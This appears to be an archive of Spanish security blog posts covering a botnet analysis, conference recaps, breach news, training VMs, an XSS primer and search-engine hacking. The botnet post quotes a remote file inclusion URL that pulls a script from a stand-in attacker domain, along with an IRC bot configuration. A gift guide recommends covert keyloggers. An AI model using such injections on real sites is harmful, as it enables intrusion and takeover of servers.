Analizando una Botnet y buscando a sus administradores.

Hace unos días un conocido me comentó que alguien había intentado acceder a su web y había tratado inyectar una URL, pero la forma de hacerlo no tenía sentido. Me llamó la atención y le dije que me enviase ejemplos de lo que habían tratado de hacer.

Intento de explotación de un LFI:

www.dominiovictima.com/gratis//appserv/main.php?appserv_root=http://www.dominiocontroladoporelatacante.com/e107_themes/temp/remote/j1.txt

Analizando la URL atacada podemos ver dos partes claramente diferenciadas, la url víctima y la inyección, en esta última vemos otra URL que contiene un archivo .txt:

/appserv/main.php?appserv_root=http://www.dominiocontroladoporelatacante.com/e107_themes/temp/remote/j1.txt

Vamos a ver el contenido de ese sospechoso txt que podeis encontrar aqui:

<?php
var $config = array("server"=>"irc.dominio.net", 
                     "port"=>"6667",   
                     "pass"=>"",  
                     "prefix"=>"BoT",  
                     "maxrand"=>"5",  
                     "chan"=>"#channel",  
                     "chan2"=>"#channel", 
                     "key"=>"senhadocanal",     
                     "modes"=>"+p",            
                     "password"=>"terpmak",          
                     "trigger"=>".",  
                     "hostauth"=>"127.0.0.1" 
                     );
?>

A simple vista lo primero que llama la atención son tres cosas, una cabecera bastante descriptiva de lo que hace el script, unas líneas de configuración y un footer con el nombre de una comunidad.

Comprometen el sistema de navegación de un avión mediante Android

Hugo Teso, piloto comercial e investigador de seguridad en la compañía de seguridad alemana N.Runs ha presentado un método a través del cual logra el control total sobre el sistema de navegación de un avión logrando manipular la ruta de éste.

Teso dijo que fue capaz de interceptar las comunicaciones con el enlace de 1Mbps descartando la información real e inyectando información falsa utilizando hardware de control de navegación y software específico que se puede encontrar públicamente el cual fue usado de puente.

"Esperaba que tuviesen agujeros de seguridad pero no me esperaba que fuesen tan fáciles de  detectar. Pensaba que tendría que luchar duro para entrar pero no fue tan difícil", Dijo Teso

Su aplicación no era mas que una prueba de concepto y comentó que las agencias europeas y americanas ya están trabajando en arreglar el problema. Dada la gravedad del problema esperemos ver una solución en el plazo mas breve posible.

Paper: Aircraft Hacking: Practical Aero Series

Crónica RootedCon 2013: Día 3

Todo lo bueno se acaba y como la RootedCon no es una excepción hoy ha sido el último día de esta edición 2013. Desde aquí felicitar a la organización por hacer posible una conferencia a este nivel a la que por supuesto asistiré el año que viene.

Vamos con la crónica de uno de los días mas fuertes a nivel técnico. Abrían la mañana José Pico y David Perez con su charla sobre geolocalización de dispositivos móviles dentro de un área geográfica concreta donde presentaban un sistema de posicionamiento utilizando una estación base falsa a la que triangulaban la posición del terminal en base al tiempo de respuesta. Este sistema hacía uso de dos antenas una omnidireccional y otra direccional. Una charla mas que interesante por todo el trabajo que tiene detrás y de la que espero poder echar de nuevo un ojo a los slides y el video.

La segunda charla del día trató sobre herramientas de análisis estático interactivo para descubrimiento de vulnerabilidades en la cual Joxean Koret analizó el panorama actual de herramientas de este tipo y presentó su herramienta que en un futuro esperemos pueda suplir las carencias actuales.

Tras el primer descanso de la mañana era el turno de Jaime Sanchez en la que mostró las utilidades prácticas de encolar el trafico TCP/IP desde el kernel hasta el espacio de usuario. Durante la charla realizó varias demos en las cuales mostró como realizar tareas de fingerprinting dejando huellas falsas y evadir IDS's además de evitar firewalls spoofeando la ip de origen en las peticiones realizadas contra el servidor atacado.

Para finalizar la mañana llegó el turno de presentar proyectos en RootedForge aunque por desgracia este año estuvo flojo en ese aspecto y solamente se presentaron tres.

Tras la comida tocó volver a tener miedo de nuestros dispositivos móviles con la charla dada por Raúl Siles dejando en evidencia las carencias de dichos dispositivos en el apartado de WiFi, además durante la charla se presentó iStupid, una herramienta que ayuda en las tareas de borrado de AP guardados en dispositivos iOS. Como colofón final de esta charla  que no dejó títere con cabeza, mostraba como lograr que impersonando un server Radius se enviase el nombre de usuario y la contraseña en plano.

La penúltima charla del día venía a cargo de Albert López en el que analizaba diversas vulnerabilidades en la librería glibc en la gestión del heap. Una interesantísima charla que requería un poco mas de tiempo para exponer, pero que echando un ojo al paper publicado se puede aprender mucho de el gran análisis que Albert ha realizado.

Ahora si que ya se acababa el día y antes de la charla final sobre IPv6 aparecía por allí Chema Alonso con Wardog que por primera vez se daba a conocer y se exponía a una ronda de preguntas. Ahora si y para finalizar la RootedCon 2013 Chema Alonso cerraba la fiesta con una charla sobre los peligros de IPv6 y diferentes ataques - aunque un "maligno" smartphone casi se carga la demo - ademas de presentar la Evil FOCA que presumiblemente será liberada en breves.

Y aquí se acabó para mi esta Rooted, solamente agradecer a todos los que hacen posible este tipo de eventos y a esperar al año que viene para volver a ver a la gente conocida este año y a ser posible intentar tener algo para mostrar.

Crónica RootedCon 2013: Día 2

Ya se ha acabado el segundo día de la conferencia y es hora de resumir lo que ha sido el día de hoy.

Las mañana ha empezado con la charla de Andrés Tarasco y Miguel Tarasco, donde han presentado la herramienta que están desarrollando para auditorías en redes Wireless, para la que ademas estan buscando colaboración para mejorarla, así que si estas interesado o quieres echarle un vistazo al proyecto puedes informarte en https://www.owisam.org/

En la segunda charla de la mañana Jesús Olmos ha presentado otra herramienta de auditoría llamada Chrome Hack. En este caso se trata de una extensión para Google Chrome para auditoría de aplicaciones web que permite bruteforce de formularios con wordlist, fuzzeo de directorios y varias opciones mas. La herramienta está en desarrollo actualmente y puedes acceder a ella en http://www.bitbucket.org/sha0coder

Tras el breve descanso de rigor tocaba la charla de David Barroso, en la cual se presentó un análisis de las extorsiones a empresas mediante DDoS, analizando diferentes herramientas que los extorsionadores utilizaban en países como Rusia o Alemania ademas de la metodología usada para tracear a estas mafias.

Como cuarta charla del día tocaba la charla que detrás de un extraño título - Ke ase android?- ocultaba un gran trabajo de investigación. El ponente, Sebastián Guerrero, al que ya pudimos ver en la anterior RootedCon nos presentaba un RootKit diseñado para Android con el que tomaba control total del dispositivo evadiendo cualquier tipo de control de seguridad del terminal al instalarse directamente en el núcleo del OS alejado de la capa de usuario que es donde se lleva a cabo los controles de seguridad.

José Luis Verdeguer - RootedCon 2013

Una vez comidos, José Luis Verdeguer desvelaba, en su charla "FreePBX for fun & profit", una serie de vulnerabilidades descubiertas en FreePBX que se están explotando en la actualidad y que suponen un grave perjuicio económico para las empresas con un sistema comprometido. Sin alargarme mucho, tras comprometer un sistema un atacante puede controlar totalmente el sistema de VoIP que gestiona y utilizarlo para realizar llamadas gratuitas, ademas de todos los problemas que conlleva para la empresa el rooteo de una maquina interna.

Como última charla Roberto Baratta nos explicaba como en su organización - Nova Galicia Banco - hacían frente al fraude electrónico partiendo de la base de que dicho fraude va a suceder. Además de mostrar los sistemas tanto tecnológicos como procedurales que utilizan para hacerle frente.

Para finalizar el día tuvo lugar el RootedPanel donde se trataba el futuro profesional y la formación de los profesionales en seguridad TI en el cual no se llegó a un consenso completo y hubo diferentes opiniones para todos los gustos.

Mañana toca madrugar de nuevo para asistir a lo que para mi gusto es el día mas fuerte de esta Rooted 2013 - aunque ya hayamos visto autenticas virguerías - así que ya sabéis mañana pasaros por Shellshocklabs de nuevo y tendréis un nuevo resumen de lo que fue el día.

El culebrón de John McAfee llega hasta límites insospechados

Desde luego que la noticia de la detención de John McAfee por la policía de Belize llamó la atención de propios y extraños. Desde el primer momento el caso causó revuelo y parecía un guión de novela negra mas que una historia real, un famoso, un asesinato, una escapada, el descubrimiento del escondite de McAfee a través de los datos EXIF. Pero lo que ha publicado el señor McAfee en su blog es digno de película.

Al parecer tras el allanamiento de su propiedad y el asesinato de su perro, John pasó a la ofensiva, compró 75 portátiles a los que instaló un troyano y empaquetó de nuevo como si fuesen nuevos para enviarlos como regalo empleados gubernamentales, oficiales de policía, asistentes del gabinete de ministros y parejas de gente poderosa. Tras esparcir el hardware contrató a 4 personas a tiempo completo para controlar la información recibida y proveer las contraseñas de email, Facebook y otros servicios.

Por si todo esto no se queda corto, afirma que contrató a 23 mujeres y 6 hombres para llevar a cabo una compleja labor de ingeniería social, a estas personas se les entrenó para instalar software en los ordenadores de los objetivos en poco tiempo, mientras dormían, comían o se duchaban ademas de conseguir acceso a los SMS de los objetivos debido a la proximidad.

Por otro lado McAfee utilizó ingenieria social por si mismo para acceder a datos confidenciales de dos compañías de telefonía y así conseguir la red de contactos de sus objetivos principales. Simultáneamente se envió a los ingenieros sociales a realzar una labor de inteligencia a personas clave relacionadas con los ministros gubernamentales equipados con una grabadora, software, regalos, una historia y una sonrisa seductora mientras que McAfee enviaba semanalmente un email al primer ministro reclamando una disculpa que nunca recibió.

Según el autor de toda esta historia, lo que buscaba era algún tipo de revancha y por lo visto encontró algún que otro "trapo sucio" como escarceos amorosos, la presumible homosexualidad del presidente del UDP o la orden de asesinato de Arthur Young por parte del Presidente.

Y la historia no acaba aquí pero no quiero extenderme mucho en esta entrada, podeis seguir leyendo este historia en el blog de McAfee si queréis entreteneros un rato, ya que en mi opinión esto no son mas que los delirios de un señor con ganas de llamar la atención dado lo inverosímil de esta historia.

¿Y vosotros que opináis, creeis que McAfee ha llevado a cabo una de las tramas de espionaje mas elaboradas por una persona o por el contrario veis en esto los delirios de un hombre viejo conocido por sus experimentos con las drogas?

Guía de compras para el hacker navideño

Se acercan esas fechas tan señaladas en el calendario y es hora de comprar cosas que de verdad nos interesan, las ventajas de los autorregalos es que no tienes que decir frases del estilo "Oh, unos calcetines, con lo que me hacían falta..." o el clásico "¡Me encanta! Este...este...¿Esto que es lo que es?". Alejándonos de tópicos vamos a lo que de verdad nos interesa, ¿Que te puedes autorregalar para empezar el año con buen pie? Esta es una lista de ideas para que completes tu librería, caja de herramientas o laboratorio con juguetes de lo mas interesante.

RaspberryPi

A estas alturas todos deberían conocer que es el Raspberry Pi, este pequeño ordenador con arquitectura ARM nos aporta una versatilidad importante a la hora de desarrollar cualquier tipo de proyecto, esto sumado a su bajo precio ($25) puede hacer las delicias de muchos a la hora de disponer de un terminal autónomo para diversas tareas, entre ellas disponer de una plataforma para pentesting que cabe en el bolsillo ya que RPi puede funcionar con pilas AA o incluso una placa solar lo que añadido a la distro PwnPi puede ser de gran utilidad.

Si estas interesado en una de estas placas puedes hacerte con ella en alguno de los distribuidores que lo tienen en disposición: http://www.raspberrypi.org/

Antena Wifi USB

Por todos es sabido que en nuestra mochila no puede faltar un receptor wifi con potencia suficiente  para llegar a la red de los esquimales. Por eso si aún no tienes una estas en las fechas perfectas para darte el capricho.

Por experiencia personal suelo recomendar el receptor Alfa AWUS036H ya que tiene un gran alcance a un precio reducido.

Kit Lockpicking 

Siempre me ha llamado la atención pero nunca me he decidido a darle caza a uno de estos kits de ganzúas. Si tu no eres como yo y quieres uno puedes hacerte con uno estas navidades y ya de paso impresionar a tus amigos con tus dotes de espías.

En la sección de marchandising de la Defcon tienen una serie de kits a la venta, pero si os queréis evitar el lío de un pedido internacional, en el siguiente enlace podéis echar un vistazo a todos los tipos de paquetes que tienen:

http://www.factoriaespia.com/ganzuas/

Libros 

Las navidades son tiempo de descanso, pero como nosotros no paramos nunca es un buen momento para hacerse con libros con los que aprender nuevos conocimientos o repasar cosas que queremos mejorar. En este caso voy a recomendar los dos últimos líbros que he leído y que creo que todo el mundo debería echarles un ojo. En primer lugar "Metasploit para Pentesters" que ha sido publicado hace poco por Informática64 y escrito por Pablo González Perez junto con Chema Alonso, guía al lector a través de las diferentes secciones de Metasploit junto con sus respectivas PoC. Lo dicho un "Must have".

El segundo libro que quiero recomendar es "Social Engineering: The art of human hacking" escrito por Chris Hadnagy y editado en españa por Anaya Multimedia, podéis conseguir el libro desde aquí. En el se tratan diversos temas que van desde el analisis de microexpresiones o ganarse la confianza de otra persona hasta análisis de herramientas como SET o Maltego.

Keylogger físico

Lo sabes, quizás no lo uses nunca, pero lo quieres, es por eso que tiene que estar en esta lista. Existen muchos tipos de keylogger físicos que pueden ayudarte en un pentest -o en otros menesteres- y por eso hay donde elegir para que se adapten a tus necesidades. 

Por unos precios entre 60 y 80 euros puedes hacerte con uno de estos keyloggers que una vez instalados tendrás que recuperar. Existen modelos tanto para conectores PS2 como USB.

http://www.microcubo.com/buscar/keylogger

Y si ya estas dispuesto a tirar la casa por la ventana por un precio que ronda los 150€ puedes hacerte con un keylogger como los anteriores con conexión wifi que ademas de recopilar los datos que introduce el usuario te envía por email la información colectada. Puedes hacerte con uno de estos en keelog.com

AR Drone

Si bien no es un dispositivo que podamos utilizar en un pentest el AR Drone es un gadget que todo geek desearía tener en su colección. Y quien sabe, el cuadricóptero armado con su cámara puede ser de utilidad si le echáis algo de imaginación. Si os interesa y estais dispuestos a gastaros lo que cuesta, podeis informaros de donde conseguirlo en la página oficial: http://ardrone2.parrot.com/lo-quiero/

Emotiv

Y por último el gadget mas "friki" de todos. Un interfaz cerebro-máquina que permite a un usuario controlar un ordenador con la mente. Si estás interesado en el hardware hacking este puede ser un muy buen regalo que puedes hacerte pese a su elevado precio, ya que cuentan por ahí que han conseguido extraer información confidencial de un cerebro humano con este aparato y unas pocas modificaciones. Si os interesa podéis haceros con uno desde aquí: http://www.emotiv.com/




Ahora contadnos, ¿que tenéis pensado comprar en estas navidades?

Team Inj3ct0r hackea ExploitHUB y publica 200 Exploits privados

Hace poco el Team Inj3ct0r ha logrado volcar la base de datos de la página ExploitHUB haciéndose con los exploits alojados en esa página y que eran vendidos por un módico precio. Según publican en este TXT los exploits robados están valorados en $242333 y ahora están alojados en 1337day.com algunos gratuitamente y otros de pago.

Podéis encontrar los detalles de la intrusión en el txt que tenéis mas arriba junto a una lista de los exploits extraídos.

El motivo por el que inj3ct0r ha hackeado ExploitHUB es según ellos que los administradores de la página son unos lamers y que no son capaces de proveer de una adecuada seguridad a sus clientes. Daría mi opinión, pero es fácil de deducir.

¡Que paséis buen fin de semana!

Fuente: Blackploit

PwnPi, distro para pentesters en el RaspberryPi

Muchos de vosotros ya conoceréis el RaspberryPi, la pequeña placa con grandes capacidades y a un precio muy asequible - 25 euros - desarrollada por la Fundación RaspberryPi. Hoy os quiero presentar esta distribución destinada para este pequeño artilugio que podrá hacer las delicias de muchos de vosotros. 

PwnPi es una distro basada en Debian armada con un total de 181 herramientas para todo tipo de propósitos. Actualmente se encuentra en la versión 2.0 y es totalmente funcional aún estando en constante desarrollo. Podéis echar un vistazo a todas las herramientas en este enlace.

El tamaño, la autonomía - podemos utilizarlo con pilas AA, placas solares o USB- y una conexión remota pueden hacer de esta placa conectada a la red de un objetivo un enemigo a tener en cuenta.

Descarga: http://www.pwnpi.net/download.html

Ya nos contaréis que maldades se os ocurren...

Recopilación de VM's y WebApps vulnerables para entrenamiento

Una de las mejores formas de aprender es recrear escenarios reales y llevar a cabo intrusiones sobre ellos, en esta tarea un buen recurso son las imágenes preconfiguradas que hay a nuestra disposición en la red, para todos aquellos que están dispuestos a ponerse manos a la obra va dedicada esta entrada.

Todo lo que necesitas es un programa de virtualización - VBox o VMWare por ejemplo -, un servidor web, paciencia y muchas ganas.

Vamos con la lista:

Metasploitable

Ya hablamos de él en una entrada anterior, Metasploitable es una imagen creada por el equipo de Metasploit sobre Ubuntu donde se han preconfigurado una serie de servicios como Tomcat, Tikiwiki o MySQL para llevar a cabo tests de intrusión.

Link: Descarga aquí

Metasploitable 2

Se trata de una evolución de la imagen anterior con mas vulnerabilidades añadidas.

Link: Descarga aquí

Lamp Security

Lampsecurity consta de una serie de imágenes dedicadas al entrenamiento en seguridad de linux, php, mysql y apache. Además en la web tenéis a mano documentación para no perderse por el camino.

Link: Descarga aquí

Moth

Moth es una imagen dedicada al aprendizaje de seguridad de aplicaciones web. Integra PHP-IDS y mod-security para ayudar al alumno a entender como funcionan los firewall de aplicaciones webs.

Link: Descarga aquí

Damn Vulnerable Linux

DVL integra todo lo que un sistema inseguro debe tener, configuraciones pobres, servicios desactualizados y software explotable para deleite del estudiante.

Link: Descarga aquí

PwnOS

Como su propio nombre indica es una distribución preparada para la intrusión, la finalidad es conseguir acceso root a traves de uno de los multiples puntos de entrada disponible.

Link: Descarga aquí

DVWA

Damn Vulnerable Web App es una aplicación web que podeis desplegar en un servidor web local, tiene diversos niveles de dificultad y podréis entrenar vuestras habilidades con numerosos ataques web como LFI, RFI, XSS, XSRF o SQLi.

Link: Descarga aquí

Gruyere

Es una aplicación de Google que te da la posibilidad no solo de aprender diferentes ataques web sino tambien de como defenderte de ellos. 

Link: Accede desde aquí

webgoat

webgoat es una aplicación construida en J2EE y provista por OWASP que te guiará a traves de diferentes retos simulando escenarios reales mientras aprendes los diferentes tipos de ataques existentes en la web.

Link: Descarga aquí

Aquí lo dejamos por hoy, existen muchos mas entornos de entrenamiento pero las dejaremos para una futura entrada. Si creéis que nos hemos dejado alguna imprescindible no dudéis en dejarlo en los comentarios.

Capture The Flag 2013

Es hora de preparar las armas, equipar nuestros entornos y agilizar nuestra imaginación para lanzarnos a la aventura en esta lucha internacional.

CTF trata de simular entornos reales donde los participantes deberán poner a prueba sus habilidades tanto ofensivas como defensivas. Cada participante debe registrarse en la plataforma de CTF365 y formar equipo con otros participantes para defender su fortaleza que se tratará de un servidor propio con unos requisitos mínimos. Las armas a usar serán a libre elección de los participantes, nmap, Nessus, Backtrack, Metasploit o lo que se desee. Según los organizadores comentan en su blog este wargame es el WoW de los hackers e intentarán aplicar el mínimo de reglas posibles para simular el mejor entorno de ciberguerra.

Las normas son simples:

1. El combatiente: Un usuario registrado en la plataforma.El combatiente debe declarar por que país está luchando, solo podrá formar parte de un equipo a la vez pero podrá unirse a otros siempre que abandone el anterior.
   
2. El equipo: Los equipos tendrán un numero minimo de 5 combatientes y un máximo de 10, que dará la flexibilidad suficiente para el ataque y la defensa. Cada equipo empezará con una fortaleza - servidor -.
   
3. Alianzas: Los equipos pueden realizar alianzas entre sí, si un equipo consigue la victoria sobre otra fortaleza los puntos van para el equipo al que pertenece, a no ser que la alianza haya sido declarada en la plataforma CTF en cuyo caso los puntos irían para los equipos pertenecientes a la alianza.
   
4. La fortaleza - tu servidor - : La fortaleza es el servidor que los combatientes deberán defender. Los requisitos mínimos son:
1. Cada fortaleza debe estar corriendo los servicios mayoritarios como SMTP, IMAP, FTP, etc. -Habrá una lista mas detallada-
2. Deberá instalarse al menos un CMS con plugins específicos.
3. La fortalezá deberá tener al menos dos navegadores instalados - punto a aclarar en un futuro -
4. Deberá correr al menos 3 aplicaciones web.
5. Deberá tener al menos dos bases de datos corriendo.

Durante el juego habrá diferentes campañas y premios que serán definidos a la hora de definir cada una. Si estáis interesados en participar podéis registraros desde la web oficial:

Página oficial CTF2013

Y para seguir las noticias seguid el blog de la plataforma:

Blog CTF2013

Si estas interesado en participar háznoslo saber en los comentarios, quedan 42 días.

¡Un saludo!

PD: Si queréis uniros a través de nuestro enlace referido podéis hacer click aquí, con ello conseguiremos acceso a la beta para contar el funcionamiento de primera mano.

Un numero desconocido de cuentas de Twitter han sido comprometidas, es hora de cambiar de contraseña...

Twitter ha comenzado a enviar masivamente emails a sus usuarios con la petición de un cambio de contraseña debido a que un numero indeterminado de cuentas han sido comprometidas. Por el momento se desconoce la causa por la que se han filtrado las contraseñas.

TechCrunch informa que ha contactado con Twitter para conocer la gravedad del problema pero no ha recibido respuesta, simplemente Twitter se ha limitado a afirmar que el email es real y que todo usuario que lo haya recibido debe seguir el enlace adjunto.

Puede que vuestro email haya filtrado el email y lo enviase a spam por lo que es recomendable que lo reviséis. Por otra parte que Twitter envíe un correo con un enlace adjunto para resetear la contraseña me parece una irresponsabilidad por lo que si es tu caso te recomiendo que escribas manualmente el link en la barra de direcciones para asegurarte que realmente te diriges a la página de reset de password y no hacia un rápido ataque de phishing.

A continuación dejo el contenido del email:

Hi, [name]
Twitter believes that your account may have been compromised by a website or service not associated with Twitter. We’ve reset your password to prevent others from accessing your account.
You’ll need to create a new password for your Twitter account. You can select a new password at this link:
https://twitter.com/pw_rst/…
As always, you can also request a new password from our password-resend page: https://twitter.com/account/resend_password
Please don’t reuse your old password and be sure to choose a strong password (such as one with a combination of letters, numbers, and symbols).
In general, be sure to:
Always check that your browser’s address bar is on a https://twitter.com website before entering your password. Phishing sites often look just like Twitter, so check the URL before entering your login information!
Avoid using websites or services that promise to get you lots of followers. These sites have been known to send spam updates and damage user accounts.
Review your approved connections on your Applications page at https://twitter.com/settings/applications. If you see any applications that you don’t recognize, click the Revoke Access button.
For more information, visit our help page for hacked or compromised accounts.
The Twitter Team

UPDATE:
Twitter asegura que el reset de cuentas ha sido un error por su parte y que su seguridad no ha sido comprometida. Podéis leer el post aquí.

Fuente: http://techcrunch.com/2012/11/08/you-might-have-gotten-an-email-from-twitter-about-your-account-being-compromised/

Niños etíopes analfabetos hackean un Motorola Xoom

Hace un año el proyecto One Laptop Per Child propuso la idea de abandonar una serie de tablets dentro de cajas cerradas en dos aldeas rurales de Etiopía sin ningún tipo de instrucciones. El objetivo era conseguir que los niños con edades comprendidas entre los 7 y 11 años aprendiesen a utilizarlos por sí mismos.

Nicholas Negroponte, fundador del proyecto dijo:

"Pensé que los niños jugarían con las cajas, pero en cuatro minutos uno de los niños no solo abrió la caja sinó que encontró el interruptor y lo encendió. En cinco días se estaban utilizando una media de 47 apps por niño, en dos semanas estaban cantando canciones del abecedario por la aldea y en 5 meses lograron hackear Android."

En la parte técnica cada tablet venía cargado con un software diseñado para niños llamado NELL - podeis leer mas información en este PDF - que limitaba el acceso a la camara y anulaba la modificación del escritorio, pero los niños se las ingeniaron para conseguir acceso a la cámara y lograron saltarse las restricciones de configuración del escritorio perdonalizándolo a su gusto ydejando boquiabiertos a los investigadores.

Toda esta investigación forma parte de un estudio mayor a nivel mundial del que os podeis informar en el siguiente enlace:

http://blog.laptop.org/



Todos tenemos un hacker dentro

Tutorial básico Cross Site Scripting

Hoy nos toca tratar una de las vulnerabilidades mas habituales en el desarrollo web actualmente, el XSS. Esta falla de seguridad se debe a un incorrecto filtrado de los valores que un usuario puede introducir en una web dando así pie a la ejecución de código de scripting en la web atacada.

A través de este método un atacante puede robar los credenciales de un usuario o administrador, modificar contenido en la web, eliminar restricciones impuestas desde el lado del cliente y muchas otras cosas.

Existen dos tipos de XSS:

• Indirecto o reflejado: Funciona modificando valores que una web pasa entre página. Ocurre cuando se envía un mensaje o ruta en una URL, una cookie o en la cabecera HTTP.
• Directo o persistente: Consiste en almacenar código en la web para que se ejecute una vez que la web se carga, por ejemplo inyectando en un libro de visitas de una web en un blog o en una sección de comentarios.

Este fallo está muy extendido debido a que muchos dessarrolladores no son conscientes de que los filtros -si los hay- se pueden evadir fácilmente con algunas técnicas.

#OpAntiPedofilia lanzada por Anonymous acaba con multitud de sitios de pornografía infantil

Desde hace unos días el colectivo Anonymous ha lanzado la #OpAntiPedofilia, que ha concentrado los esfuerzos por destapar páginas, personas y redes que comparten pornografía infantil en internet.

El grupo a través de varios comunicados publicados en Pastebin informa que han logrado desactivar varias páginas pedófilas.

En un primer comunicado el grupo afirma haber descubierto múltiples sitios de pornografía infantil en un hosting gratuito (.50megs.com), por lo que han utilizado unas búsquedas de google para indentificar sus objetivos. Con la información encontrada han descubierto varios blogs alojados con nombres aleatorios - como asyesahjsa- que simulan ser un blog inocente pero con un campo de identificación que afirman enlaza a un foro donde se comparte pornografía. En este caso se han centrado en reportar estas páginas al hosting y así desactivarlas permanentemente.

En un segundo comunicado, el grupo asociado xL3gi0nhackers afirma haber atacado unas 48 páginas con contenido pedófilo. El método utilizado en este caso ha sido un DDoS por lo que en este momento los objetivos continúan con su servicio en línea.

Ademas en Twitter hay un gran seguimiento de perfiles individuales relacionados con la pornografía infantil. En vista al movimiento de la operación lanzada por Anonymous se prevén ataques en los próximos días a páginas de contenido similar. Pese a que un ataque DDoS no consiga acabar con este tipo de contenido la operación tiene un gran potencial para llamar la atención y hacernos ver el peligro que corren los menores en la red.

Search Engine Hacking (I)

Cuando la mayoría de los usuarios medios o novatos piensan en internet, la primera imágen que les suele venir a la cabeza es la página principal de Google. Se ha convertido en algo casi cultural, pensámos que Google, lo sabe todo. Y en efecto, hasta cierto punto, es así. Sin embargo tendemos a sobrestimar Google, y subestimar las capacidades de otros buscadores de contenidos como Bing, DuckDuckGo, RTbot, o buscadores de host's como ShodanHQ, de respuestas como Wolfram Alpha, etc.

En este conexto, es importante abrir nuestra mente, y saber que hay alternativas muy útiles ahí fuera, y que en esto del Google-hacking, toda ayuda es poca para obtener los resultados que queremos. Si bien un buscador inmenso como Google tiene sus indiscutibles ventajas, las cantidades de información que este maneja a veces pueden ser un handicap si lo que buscamos es algo muy concreto.

Podemos ver como cada buscador tiene sus propias características, sus puntos fuertes y sus puntos débiles, y conocer una amplia gama de ellos puede ahorrarnos horas de pasar páginas y páginas de nuestro amado Google. Es por eso por lo que he decidido que cada día, voy a intentar hablar un poco de cada uno de ellos, y de las posibilidades que nos dan en temas de Google-hacking. En algunos me extenderé más que en otros, pero intentaré explicar lo que nos puede aportar cada uno en nuestra taréa.

• Google: El gigante de las búsquedas. Google es a día de hoy el buscador con mayor porcentaje de internet en sú índice de contenidos.La cantidad de infromación es ingente, y sin embargo, la búsqueda es rápida. Podemos desde buscar contenidos, hasta buscar por tiempo de aparición, o incluso buscar patrones visuales. Por la gran cantidad de esfuerzos y arañas que tienen indexando internet, muchas veces llegan a los resultados desde contraseñas, hasta báses de datos de usuarios y contraseñas.

 

•  Bing: Bing se caracteriza por acotar los restulados bastante más que Google. Su indexado de cada página es algo más profundo, por lo que habitualmente, indexa más documentos privados que se encuentran en páginas accidentalmente. Otra de las grandes funciones de Bing es la etiqueta "ip:". Con esto podemos saber los nombres de dominio que se resuelven bajo esa misma IP, que en la mayoría de los casos, suelen ser bastantes. Además, Bing tiene una API bastante libre, es por ello por lo que todos los buscadores inversis de DNS suelen basar su funcionamiento en los resultados que ofrece este buscador.

• Shodan: Con el nombre Shodanhq, este buscador ha hecho lo que otros pronto han descartado, indexar host's y sus cabeceras, en vez de contenido. Como resultado tenemos una base de datos a la que hacer consultas con millones de direcciones IP que pueden corresponder a todo tipo de sistemas, desde routers, a sistemas scada, hasta servidores de backups de empresas, o sistemas utilizados por ISP's para enroutado de paquetes. Además las etiquetas "net:" o la busqueda por nombres de dominio pueden hacer las delicias de cualquier penetration tester que quiera identificar de manera rápida las IP's utilizadas por, por ejemplo, una universidad.

En sucesivas entradas iré explicando detalladamente lo que podemos hacer con cada uno de estos buscadores.